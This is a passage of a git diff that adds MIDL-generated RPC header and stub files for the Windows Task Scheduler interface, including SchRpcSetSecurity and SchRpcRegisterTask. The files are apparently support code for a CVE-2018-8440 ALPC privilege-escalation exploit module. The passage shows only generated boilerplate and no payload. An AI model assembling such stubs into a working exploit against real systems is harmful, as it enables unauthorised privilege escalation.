+/* 292 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (246) */
+
+			0x0
+        }
+    };
+
+static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
+    {
+    0,
+    42,
+    132,
+    192,
+    246,
+    300,
+    354,
+    426,
+    498,
+    558,
+    642,
+    690,
+    738,
+    816,
+    864,
+    918,
+    996,
+    1050,
+    1110,
+    1158
+    };
+
+
+static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
+    {
+    (void *)& DefaultIfName___RpcClientInterface,
+    MIDL_user_allocate,
+    MIDL_user_free,
+    &DefaultIfName__MIDL_AutoBindHandle,
+    0,
+    0,
+    0,
+    0,
+    rpc__MIDL_TypeFormatString.Format,
+    1, /* -error bounds_check flag */
+    0x50002, /* Ndr library version */
+    0,
+    0x800025b, /* MIDL Version 8.0.603 */
+    0,
+    0,
+    0,  /* notify & notify_flag routine table */
+    0x1, /* MIDL flag */
+    0, /* cs routines */
+    0,   /* proxy/server info */
+    0
+    };
+#if _MSC_VER >= 1200
+#pragma warning(pop)
+#endif
+
+
+#endif /* defined(_M_AMD64)*/
+
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h
new file mode 100755
index 0000000000..d216044a65
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h
@@ -0,0 +1,251 @@
+
+
+/* this ALWAYS GENERATED file contains the definitions for the interfaces */
+
+
+ /* File created by MIDL compiler version 8.00.0603 */
+/* at Wed Sep 19 20:58:45 2018
+ */
+/* Compiler settings for rpc.idl:
+    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 
+    protocol : dce , ms_ext, c_ext, robust
+    error checks: allocation ref bounds_check enum stub_data 
+    VC __declspec() decoration level: 
+         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
+         DECLSPEC_UUID(), MIDL_INTERFACE()
+*/
+/* @@MIDL_FILE_HEADING(  ) */
+
+#pragma warning( disable: 4049 )  /* more than 64k source lines */
+
+
+/* verify that the <rpcndr.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCNDR_H_VERSION__
+#define __REQUIRED_RPCNDR_H_VERSION__ 475
+#endif
+
+#include "rpc.h"
+#include "rpcndr.h"
+
+#ifndef __RPCNDR_H_VERSION__
+#error this stub requires an updated version of <rpcndr.h>
+#endif // __RPCNDR_H_VERSION__
+
+
+#ifndef __rpc_h_h__
+#define __rpc_h_h__
+
+#if defined(_MSC_VER) && (_MSC_VER >= 1020)
+#pragma once
+#endif
+
+/* Forward Declarations */ 
+
+/* header files for imported files */
+#include "oaidl.h"
+#include "ocidl.h"
+
+#ifdef __cplusplus
+extern "C"{
+#endif 
+
+
+#ifndef __DefaultIfName_INTERFACE_DEFINED__
+#define __DefaultIfName_INTERFACE_DEFINED__
+
+/* interface DefaultIfName */
+/* [version][uuid] */ 
+
+typedef struct Struct_18_t
+    {
+    /* [string][unique] */ wchar_t *StructMember0;
+    /* [string][unique] */ wchar_t *StructMember1;
+    long StructMember2;
+    } 	Struct_18_t;
+
+typedef struct Struct_74_t
+    {
+    long StructMember0;
+    long StructMember1;
+    /* [string][unique] */ wchar_t *StructMember2;
+    /* [string][unique] */ wchar_t *StructMember3;
+    } 	Struct_74_t;
+
+typedef struct Struct_144_t
+    {
+    long StructMember0;
+    short StructMember1;
+    short StructMember2;
+    byte StructMember3[ 8 ];
+    } 	Struct_144_t;
+
+typedef struct Struct_246_t
+    {
+    short StructMember0;
+    short StructMember1;
+    short StructMember2;
+    short StructMember3;
+    short StructMember4;
+    short StructMember5;
+    short StructMember6;
+    short StructMember7;
+    } 	Struct_246_t;
+
+long _SchRpcHighestVersion( 
+    /* [in] */ handle_t IDL_handle,
+    /* [out] */ long *arg_1);
+
+long _SchRpcRegisterTask( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][unique][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3,
+    /* [string][unique][in] */ wchar_t *arg_4,
+    /* [in] */ long arg_5,
+    /* [in] */ long arg_6,
+    /* [size_is][unique][in] */ struct Struct_18_t *arg_7,
+    /* [string][ref][out] */ wchar_t **arg_8,
+    /* [ref][out] */ struct Struct_74_t **arg_9);
+
+long SchRpcRetrieveTask( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long *arg_3,
+    /* [string][ref][out] */ wchar_t **arg_4);
+
+long _SchRpcCreateFolder( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][unique][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3);
+
+long _SchRpcSetSecurity( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3);
+
+long _SchRpcGetSecurity( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [string][ref][out] */ wchar_t **arg_3);
+
+long _SchRpcEnumFolders( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ long *arg_3,
+    /* [in] */ long arg_4,
+    /* [out] */ long *arg_5,
+    /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6);
+
+long _SchRpcEnumTasks( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ long *arg_3,
+    /* [in] */ long arg_4,
+    /* [out] */ long *arg_5,
+    /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6);
+
+long _SchRpcEnumInstances( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][unique][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out] */ long *arg_3,
+    /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4);
+
+long _SchRpcGetInstanceInfo( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ struct Struct_144_t *arg_1,
+    /* [string][ref][out] */ wchar_t **arg_2,
+    /* [out] */ long *arg_3,
+    /* [string][ref][out] */ wchar_t **arg_4,
+    /* [string][ref][out] */ wchar_t **arg_5,
+    /* [out] */ long *arg_6,
+    /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7,
+    /* [out] */ long *arg_8);
+
+long _SchRpcStopInstance( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ struct Struct_144_t *arg_1,
+    /* [in] */ long arg_2);
+
+long _SchRpcStop( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][unique][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2);
+
+long _SchRpcRun( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [string][size_is][unique][in] */ wchar_t **arg_3,
+    /* [in] */ long arg_4,
+    /* [in] */ long arg_5,
+    /* [string][unique][in] */ wchar_t *arg_6,
+    /* [out] */ struct Struct_144_t *arg_7);
+
+long _SchRpcDelete( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2);
+
+long _SchRpcRename( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3);
+
+long _SchRpcScheduledRuntimes( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [unique][in] */ struct Struct_246_t *arg_2,
+    /* [unique][in] */ struct Struct_246_t *arg_3,
+    /* [in] */ long arg_4,
+    /* [in] */ long arg_5,
+    /* [out] */ long *arg_6,
+    /* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7);
+
+long _SchRpcGetLastRunInfo( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [out] */ struct Struct_246_t *arg_2,
+    /* [out] */ long *arg_3);
+
+long _SchRpcGetTaskInfo( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out] */ long *arg_3,
+    /* [out] */ long *arg_4);
+
+long _SchRpcGetNumberOfMissedRuns( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [out] */ long *arg_2);
+
+long _SchRpcEnableTask( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2);
+
+
+
+extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
+extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
+#endif /* __DefaultIfName_INTERFACE_DEFINED__ */
+
+/* Additional Prototypes for ALL interfaces */
+
+/* end of Additional Prototypes */
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
+
+
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c
new file mode 100755
index 0000000000..39f854b42b
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c
@@ -0,0 +1,1611 @@
+
+
+/* this ALWAYS GENERATED file contains the RPC server stubs */
+
+
+ /* File created by MIDL compiler version 8.00.0603 */
+/* at Wed Sep 19 20:58:45 2018
+ */
+/* Compiler settings for rpc.idl:
+    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 
+    protocol : dce , ms_ext, c_ext, robust
+    error checks: allocation ref bounds_check enum stub_data 
+    VC __declspec() decoration level: 
+         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
+         DECLSPEC_UUID(), MIDL_INTERFACE()
+*/
+/* @@MIDL_FILE_HEADING(  ) */
+
+#if defined(_M_AMD64)
+
+
+#pragma warning( disable: 4049 )  /* more than 64k source lines */
+#if _MSC_VER >= 1200
+#pragma warning(push)
+#endif
+
+#pragma warning( disable: 4211 )  /* redefine extern to static */
+#pragma warning( disable: 4232 )  /* dllimport identity*/
+#pragma warning( disable: 4024 )  /* array to pointer mapping*/
+
+#include <string.h>
+#include "rpc_h.h"
+
+#define TYPE_FORMAT_STRING_SIZE   295                               
+#define PROC_FORMAT_STRING_SIZE   1207                              
+#define EXPR_FORMAT_STRING_SIZE   1                                 
+#define TRANSMIT_AS_TABLE_SIZE    0            
+#define WIRE_MARSHAL_TABLE_SIZE   0            
+
+typedef struct _rpc_MIDL_TYPE_FORMAT_STRING
+    {
+    short          Pad;
+    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_TYPE_FORMAT_STRING;
+
+typedef struct _rpc_MIDL_PROC_FORMAT_STRING
+    {
+    short          Pad;
+    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_PROC_FORMAT_STRING;
+
+typedef struct _rpc_MIDL_EXPR_FORMAT_STRING
+    {
+    long          Pad;
+    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_EXPR_FORMAT_STRING;
+
+
+static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
+{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
+
+extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString;
+extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString;
+extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString;
+
+/* Standard interface: DefaultIfName, ver. 1.0,
+   GUID={0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}} */
+
+
+extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;
+
+extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;
+
+static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =
+    {
+    sizeof(RPC_SERVER_INTERFACE),
+    {{0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}},{1,0}},
+    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
+    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
+    0,
+    0,
+    0,
+    &DefaultIfName_ServerInfo,
+    0x04000000
+    };
+RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;
+
+extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
+
+
+#if !defined(__RPC_WIN64__)
+#error  Invalid build platform for this stub.
+#endif
+
+static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString =
+    {
+        0,
+        {
+
+	/* Procedure _SchRpcHighestVersion */
+
+			0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
+/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
+/*  8 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 14 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 16 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x2,		/* 2 */
+/* 20 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 28 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 30 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 34 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 36 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 38 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 40 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcRegisterTask */
+
+
+	/* Return value */
+
+/* 42 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 44 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 48 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 50 */	NdrFcShort( 0x58 ),	/* X64 Stack size/offset = 88 */
+/* 52 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 54 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 56 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 58 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 60 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0xa,		/* 10 */
+/* 62 */	0xa,		/* 10 */
+			0x5,		/* Ext Flags:  new corr desc, srv corr check, */
+/* 64 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 66 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 68 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 70 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 72 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 74 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 76 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_1 */
+
+/* 78 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 80 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 82 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 84 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 86 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 88 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 90 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 92 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 94 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_4 */
+
+/* 96 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 98 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 100 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_5 */
+
+/* 102 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 104 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 106 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_6 */
+
+/* 108 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 110 */	NdrFcShort( 0x38 ),	/* X64 Stack size/offset = 56 */
+/* 112 */	NdrFcShort( 0xe ),	/* Type Offset=14 */
+
+	/* Parameter arg_7 */
+
+/* 114 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 116 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 118 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_8 */
+
+/* 120 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 122 */	NdrFcShort( 0x48 ),	/* X64 Stack size/offset = 72 */
+/* 124 */	NdrFcShort( 0x42 ),	/* Type Offset=66 */
+
+	/* Parameter arg_9 */
+
+/* 126 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 128 */	NdrFcShort( 0x50 ),	/* X64 Stack size/offset = 80 */
+/* 130 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure SchRpcRetrieveTask */
+
+
+	/* Return value */
+
+/* 132 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 134 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 138 */	NdrFcShort( 0x2 ),	/* 2 */
+/* 140 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 142 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 144 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 146 */	NdrFcShort( 0x1c ),	/* 28 */
+/* 148 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 150 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x5,		/* 5 */
+/* 152 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 154 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 156 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 158 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 160 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 162 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 164 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 166 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 168 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 170 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 172 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 174 */	NdrFcShort( 0x148 ),	/* Flags:  in, base type, simple ref, */
+/* 176 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 178 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 180 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 182 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 184 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_4 */
+
+/* 186 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 188 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 190 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcCreateFolder */
+
+
+	/* Return value */
+
+/* 192 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 194 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 198 */	NdrFcShort( 0x3 ),	/* 3 */
+/* 200 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 202 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 204 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 206 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 208 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 210 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 212 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 214 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 216 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 218 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 220 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 222 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 224 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 226 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 228 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 230 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 232 */	NdrFcShort( 0x6 ),	/* Type Offset=6 */
+
+	/* Parameter arg_2 */
+
+/* 234 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 236 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 238 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 240 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 242 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 244 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcSetSecurity */
+
+
+	/* Return value */
+
+/* 246 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 248 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 252 */	NdrFcShort( 0x4 ),	/* 4 */
+/* 254 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 256 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 258 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 260 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 262 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 264 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 266 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 268 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 270 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 272 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 274 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 276 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 278 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 280 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 282 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 284 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 286 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_2 */
+
+/* 288 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 290 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 292 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 294 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 296 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 298 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetSecurity */
+
+
+	/* Return value */
+
+/* 300 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 302 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 306 */	NdrFcShort( 0x5 ),	/* 5 */
+/* 308 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 310 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 312 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 314 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 316 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 318 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 320 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 322 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 324 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 326 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 328 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 330 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 332 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 334 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 336 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 338 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 340 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 342 */	NdrFcShort( 0x2013 ),	/* Flags:  must size, must free, out, srv alloc size=8 */
+/* 344 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 346 */	NdrFcShort( 0x3e ),	/* Type Offset=62 */
+
+	/* Parameter arg_3 */
+
+/* 348 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 350 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 352 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnumFolders */
+
+
+	/* Return value */
+
+/* 354 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 356 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 360 */	NdrFcShort( 0x6 ),	/* 6 */
+/* 362 */	NdrFcShort( 0x40 ),	/* X64 Stack size/offset = 64 */
+/* 364 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 366 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 368 */	NdrFcShort( 0x2c ),	/* 44 */
+/* 370 */	NdrFcShort( 0x40 ),	/* 64 */
+/* 372 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x7,		/* 7 */
+/* 374 */	0xa,		/* 10 */
+			0x3,		/* Ext Flags:  new corr desc, clt corr check, */
+/* 376 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 378 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 380 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 382 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 384 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 386 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 388 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 390 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 392 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 394 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
